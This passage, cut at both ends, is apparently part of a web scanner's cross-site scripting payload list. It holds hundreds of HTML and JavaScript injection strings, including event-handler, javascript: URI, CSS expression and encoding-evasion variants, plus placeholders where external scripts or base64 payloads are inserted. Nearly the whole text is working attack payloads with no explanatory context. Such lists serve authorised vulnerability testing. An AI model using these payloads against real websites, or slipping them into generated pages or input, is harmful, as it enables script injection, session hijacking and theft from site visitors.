folder="javascript:javascript:alert(1)">XXX</a> +<x style="behavior:url(%(sct)s)"> +<xml id="xss" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label> +<event-source src="%(event)s" onload="javascript:alert(1)"> +<a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A"> +<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" 
to="&lt;img&#11;src=x:x&#11;onerror&#11;=javascript:alert(1)&gt;"> +<script>%(payload)s</script> +<script src=%(jscript)s></script> +<script language='javascript' src='%(jscript)s'></script> +<script>javascript:alert(1)</script> +<IMG SRC="javascript:javascript:alert(1);"> +<IMG SRC=javascript:javascript:alert(1)> +<IMG SRC=`javascript:javascript:alert(1)`> +<SCRIPT SRC=%(jscript)s?<B> +<FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET> +<BODY ONLOAD=javascript:alert(1)> +<BODY ONLOAD=javascript:javascript:alert(1)> +<IMG SRC="jav ascript:javascript:alert(1);"> +<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)> +<SCRIPT/SRC="%(jscript)s"></SCRIPT> +<<SCRIPT>%(payload)s//<</SCRIPT> +<IMG SRC="javascript:javascript:alert(1)" +<iframe src=%(scriptlet)s < +<INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);"> +<IMG DYNSRC="javascript:javascript:alert(1)"> +<IMG LOWSRC="javascript:javascript:alert(1)"> +<BGSOUND SRC="javascript:javascript:alert(1);"> +<BR SIZE="&{javascript:alert(1)}"> +<LAYER SRC="%(scriptlet)s"></LAYER> +<LINK REL="stylesheet" HREF="javascript:javascript:alert(1);"> +<STYLE>@import'%(css)s';</STYLE> +<META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet"> +<XSS STYLE="behavior: url(%(htc)s);"> +<STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>XSS +<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);"> +<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);"> +<IFRAME SRC="javascript:javascript:alert(1);"></IFRAME> +<TABLE BACKGROUND="javascript:javascript:alert(1)"> +<TABLE><TD BACKGROUND="javascript:javascript:alert(1)"> +<DIV STYLE="background-image: url(javascript:javascript:alert(1))"> +<DIV STYLE="width:expression(javascript:alert(1));"> +<IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1))"> +<XSS STYLE="xss:expression(javascript:alert(1))"> +<STYLE TYPE="text/javascript">javascript:alert(1);</STYLE> 
+<STYLE>.XSS{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=XSS></A> +<STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE> +<!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]--> +<BASE HREF="javascript:javascript:alert(1);//"> +<OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT> +<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT> +<HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:javascript:alert(1)"&gt;</B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> +<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;javascript:alert(1)&lt;/SCRIPT&gt;"></BODY></HTML> +<SCRIPT SRC="%(jpg)s"></SCRIPT> +<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4- +<form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X +<body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus> +<P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)"> +<STYLE>@import'%(css)s';</STYLE> +<STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE> +<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&> +<SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT> +<style onreadystatechange=javascript:javascript:alert(1);></style> +<?xml version="1.0"?><html:html 
xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html> +<embed code=%(scriptlet)s></embed> +<embed code=javascript:javascript:alert(1);></embed> +<embed src=%(jscript)s></embed> +<frameset onload=javascript:javascript:alert(1)></frameset> +script\x20type="text/javascript">javascript:alert(1);</script> +<script\x3Etype="text/javascript">javascript:alert(1);</script> +<script\x0Dtype="text/javascript">javascript:alert(1);</script> +<script\x09type="text/javascript">javascript:alert(1);</script> +<script\x0Ctype="text/javascript">javascript:alert(1);</script> +</script><script>alert(1);</script> +<script\x2Ftype="text/javascript">javascript:alert(1);</script> +<script\x0Atype="text/javascript">javascript:alert(1);</script> +'`"><\x3Cscript>javascript:alert(1)</script> +'`"><\x00script>javascript:alert(1)</script> +<img src=1 href=1 onerror="javascript:alert(1)"></img> +<audio src=1 href=1 onerror="javascript:alert(1)"></audio> +<video src=1 href=1 onerror="javascript:alert(1)"></video> +<body src=1 href=1 onerror="javascript:alert(1)"></body> +<image src=1 href=1 onerror="javascript:alert(1)"></image> +<object src=1 href=1 onerror="javascript:alert(1)"></object> +<script src=1 href=1 onerror="javascript:alert(1)"></script> +<svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize> +<title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"></title onPropertyChange> +<iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad> +<body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter> +<body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus> +<frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset onScroll> +<script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)"></script onReadyStateChange> +<html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html 
onMouseUp> +<body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"></body onPropertyChange> +<svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad> +<body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide> +<body onMouseOver body onMouseOver="javascript:javascript:alert(1)"></body onMouseOver> +<body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload> +<body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad> +<bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)"></bgsound onPropertyChange> +<html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave> +<html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel> +<style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad> +<iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"></iframe onReadyStateChange> +<body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow> +<style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)"></style onReadyStateChange> +<frameset onFocus frameset onFocus="javascript:javascript:alert(1)"></frameset onFocus> +<applet onError applet onError="javascript:javascript:alert(1)"></applet onError> +<marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart> +<script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad> +<html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html onMouseOver> +<html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html onMouseEnter> +<body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"></body onBeforeUnload> +<html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html onMouseDown> +<marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee 
onScroll> +<xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml onPropertyChange> +<frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur> +<applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)"></applet onReadyStateChange> +<svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload> +<html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut> +<body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove> +<body onResize body onResize="javascript:javascript:alert(1)"></body onResize> +<object onError object onError="javascript:javascript:alert(1)"></object onError> +<body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState> +<html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove> +<applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)"></applet onreadystatechange> +<body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide> +<svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload> +<applet onerror applet onerror="javascript:javascript:alert(1)"></applet onerror> +<body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup> +<body onunload body onunload="javascript:javascript:alert(1)"></body onunload> +<iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload> +<body onload body onload="javascript:javascript:alert(1)"></body onload> +<html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover> +<object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object onbeforeload> +<body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload> +<body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus> +<body onkeydown body 
onkeydown="javascript:javascript:alert(1)"></body onkeydown> +<iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload> +<iframe src iframe src="javascript:javascript:alert(1)"></iframe src> +<svg onload svg onload="javascript:javascript:alert(1)"></svg onload> +<html onmousemove html onmousemove="javascript:javascript:alert(1)"></html onmousemove> +<body onblur body onblur="javascript:javascript:alert(1)"></body onblur> +\x3Cscript>javascript:alert(1)</script> +'"`><script>/* *\x2Fjavascript:alert(1)// */</script> +<script>javascript:alert(1)</script\x0D +<script>javascript:alert(1)</script\x0A +<script>javascript:alert(1)</script\x0B +<script charset="\x22>javascript:alert(1)</script> +<!--\x3E<img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x00> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x21> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(1)> --> +`"'><img src='#\x27 onerror=javascript:alert(1)> +<a href="javascript\x3Ajavascript:alert(1)" id="fuzzelement1">test</a> +"'`><p><svg><script>a='hello\x27;javascript:alert(1)//';</script></p> +<a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x07cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Dcript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Acript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x08cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x02cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x03cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x04cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x01cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x05cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a 
href="javas\x0Bcript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x09cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x06cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Ccript:javascript:alert(1)" id="fuzzelement1">test</a> +<script>/* *\x2A/javascript:alert(1)// */</script> +<script>/* *\x00/javascript:alert(1)// */</script> +<style></style\x3E<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x0D<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x09<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x20<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x0A<img src="about:blank" onerror=javascript:alert(1)//></style> +"'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(1);/*';">DEF +"'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(1);/*';">DEF +<script>if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}</script> +<script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}</script> +<script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}</script> +'`"><\x3Cscript>javascript:alert(1)</script> +'`"><\x00script>javascript:alert(1)</script> +"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)> +"'`><\x00img src=xxx:x onerror=javascript:alert(1)> +<script src="data:text/plain\x2Cjavascript:alert(1)"></script> +<script src="data:\xD4\x8F,javascript:alert(1)"></script> +<script src="data:\xE0\xA4\x98,javascript:alert(1)"></script> +<script src="data:\xCB\x8F,javascript:alert(1)"></script> +<script\x20type="text/javascript">javascript:alert(1);</script> +<script\x3Etype="text/javascript">javascript:alert(1);</script> +<script\x0Dtype="text/javascript">javascript:alert(1);</script> +<script\x09type="text/javascript">javascript:alert(1);</script> +<script\x0Ctype="text/javascript">javascript:alert(1);</script> 
+<script\x2Ftype="text/javascript">javascript:alert(1);</script> +<script\x0Atype="text/javascript">javascript:alert(1);</script> +ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF +ABC<div style="x:expression\x5C(javascript:alert(1)">DEF +ABC<div style="x:expression\x00(javascript:alert(1)">DEF +ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF +ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF +ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF +ABC<div style="x:\x09expression(javascript:alert(1)">DEF +ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF +ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF +ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF +ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF +ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF +ABC<div style="x:\x20expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF +ABC<div style="x:\x00expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF +ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF +<a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a 
href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a 
href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a> +<a 
href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a> +`"'><img src=xxx:x \x0Aonerror=javascript:alert(1)> +`"'><img src=xxx:x \x22onerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Bonerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Donerror=javascript:alert(1)> +`"'><img src=xxx:x \x2Fonerror=javascript:alert(1)> +`"'><img src=xxx:x \x09onerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Conerror=javascript:alert(1)> +`"'><img src=xxx:x \x00onerror=javascript:alert(1)> +`"'><img src=xxx:x \x27onerror=javascript:alert(1)> +`"'><img src=xxx:x \x20onerror=javascript:alert(1)> +"`'><script>\x3Bjavascript:alert(1)</script> +"`'><script>\x0Djavascript:alert(1)</script> +"`'><script>\xEF\xBB\xBFjavascript:alert(1)</script> +"`'><script>\xE2\x80\x81javascript:alert(1)</script> +"`'><script>\xE2\x80\x84javascript:alert(1)</script> +"`'><script>\xE3\x80\x80javascript:alert(1)</script> +"`'><script>\x09javascript:alert(1)</script> +"`'><script>\xE2\x80\x89javascript:alert(1)</script> +"`'><script>\xE2\x80\x85javascript:alert(1)</script> +"`'><script>\xE2\x80\x88javascript:alert(1)</script> +"`'><script>\x00javascript:alert(1)</script> +"`'><script>\xE2\x80\xA8javascript:alert(1)</script> +"`'><script>\xE2\x80\x8Ajavascript:alert(1)</script> +"`'><script>\xE1\x9A\x80javascript:alert(1)</script> +"`'><script>\x0Cjavascript:alert(1)</script> +"`'><script>\x2Bjavascript:alert(1)</script> +"`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script> +"`'><script>-javascript:alert(1)</script> +"`'><script>\x0Ajavascript:alert(1)</script> +"`'><script>\xE2\x80\xAFjavascript:alert(1)</script> +"`'><script>\x7Ejavascript:alert(1)</script> +"`'><script>\xE2\x80\x87javascript:alert(1)</script> +"`'><script>\xE2\x81\x9Fjavascript:alert(1)</script> +"`'><script>\xE2\x80\xA9javascript:alert(1)</script> 
+"`'><script>\xC2\x85javascript:alert(1)</script> +"`'><script>\xEF\xBF\xAEjavascript:alert(1)</script> +"`'><script>\xE2\x80\x83javascript:alert(1)</script> +"`'><script>\xE2\x80\x8Bjavascript:alert(1)</script> +"`'><script>\xEF\xBF\xBEjavascript:alert(1)</script> +"`'><script>\xE2\x80\x80javascript:alert(1)</script> +"`'><script>\x21javascript:alert(1)</script> +"`'><script>\xE2\x80\x82javascript:alert(1)</script> +"`'><script>\xE2\x80\x86javascript:alert(1)</script> +"`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script> +"`'><script>\x0Bjavascript:alert(1)</script> +"`'><script>\x20javascript:alert(1)</script> +"`'><script>\xC2\xA0javascript:alert(1)</script> +"/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x /> +"/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x /> +"/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x /> +"/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x /> +"/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x /> +"/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x /> +"/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x /> +"/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x /> +"/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x /> +<script\x2F>javascript:alert(1)</script> +<script\x20>javascript:alert(1)</script> +<script\x0D>javascript:alert(1)</script> +<script\x0A>javascript:alert(1)</script> +<script\x0C>javascript:alert(1)</script> +<script\x00>javascript:alert(1)</script> +<script\x09>javascript:alert(1)</script> +`"'><img src=xxx:x onerror\x0B=javascript:alert(1)> +`"'><img src=xxx:x onerror\x00=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0C=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0D=javascript:alert(1)> +`"'><img src=xxx:x onerror\x20=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0A=javascript:alert(1)> +`"'><img src=xxx:x onerror\x09=javascript:alert(1)> +<script>javascript:alert(1)<\x00/script> +<img src=# onerror\x3D"javascript:alert(1)" > +<input onfocus=javascript:alert(1) autofocus> +<input 
onblur=javascript:alert(1) autofocus><input autofocus> +<video poster=javascript:javascript:alert(1)// +<body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus> +<form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X +<video><source onerror="javascript:javascript:alert(1)"> +<video onerror="javascript:javascript:alert(1)"><source> +<form><button formaction="javascript:javascript:alert(1)">X +<body oninput=javascript:alert(1)><input autofocus> +<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math> +<frameset onload=javascript:alert(1)> +<table background="javascript:javascript:alert(1)"> +<!--<img src="--><img src=x onerror=javascript:alert(1)//"> +<comment><img src="</comment><img src=x onerror=javascript:alert(1))//"> +<![><img src="]><img src=x onerror=javascript:alert(1)//"> +<style><img src="</style><img src=x onerror=javascript:alert(1)//"> +<li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div> +<head><base href="javascript://"></head><body><a href="/. 
/,javascript:alert(1)//#">XXX</a></body> +<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT> +<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT> +<object data="data:text/html;base64,%(base64)s"> +<embed src="data:text/html;base64,%(base64)s"> +<b <script>alert(1)</script>0 +<div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script> +<x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'> +<embed src="javascript:alert(1)"> +<img src="javascript:alert(1)"> +<image src="javascript:alert(1)"> +<script src="javascript:alert(1)"> +<div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x +<? foo="><script>javascript:alert(1)</script>"> +<! foo="><script>javascript:alert(1)</script>"> +</ foo="><script>javascript:alert(1)</script>"> +<? foo="><x foo='?><script>javascript:alert(1)</script>'>"> +<! 
foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>"> +<% foo><x foo="%><script>javascript:alert(1)</script>"> +<div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script> +<img \x00src=x onerror="alert(1)"> +<img \x47src=x onerror="javascript:alert(1)"> +<img \x11src=x onerror="javascript:alert(1)"> +<img \x12src=x onerror="javascript:alert(1)"> +<img\x47src=x onerror="javascript:alert(1)"> +<img\x10src=x onerror="javascript:alert(1)"> +<img\x13src=x onerror="javascript:alert(1)"> +<img\x32src=x onerror="javascript:alert(1)"> +<img\x47src=x onerror="javascript:alert(1)"> +<img\x11src=x onerror="javascript:alert(1)"> +<img \x47src=x onerror="javascript:alert(1)"> +<img \x34src=x onerror="javascript:alert(1)"> +<img \x39src=x onerror="javascript:alert(1)"> +<img \x00src=x onerror="javascript:alert(1)"> +<img src\x09=x onerror="javascript:alert(1)"> +<img src\x10=x onerror="javascript:alert(1)"> +<img src\x13=x onerror="javascript:alert(1)"> +<img src\x32=x onerror="javascript:alert(1)"> +<img src\x12=x onerror="javascript:alert(1)"> +<img src\x11=x onerror="javascript:alert(1)"> +<img src\x00=x onerror="javascript:alert(1)"> +<img src\x47=x onerror="javascript:alert(1)"> +<img src=x\x09onerror="javascript:alert(1)"> +<img src=x\x10onerror="javascript:alert(1)"> +<img src=x\x11onerror="javascript:alert(1)"> +<img src=x\x12onerror="javascript:alert(1)"> +<img src=x\x13onerror="javascript:alert(1)"> +<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)"> +<img src=x onerror=\x09"javascript:alert(1)"> +<img src=x onerror=\x10"javascript:alert(1)"> +<img src=x onerror=\x11"javascript:alert(1)"> +<img src=x onerror=\x12"javascript:alert(1)"> +<img src=x onerror=\x32"javascript:alert(1)"> +<img src=x onerror=\x00"javascript:alert(1)"> +<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a> +<img src="x` `<script>javascript:alert(1)</script>"` `> +<img src onerror /" '"= 
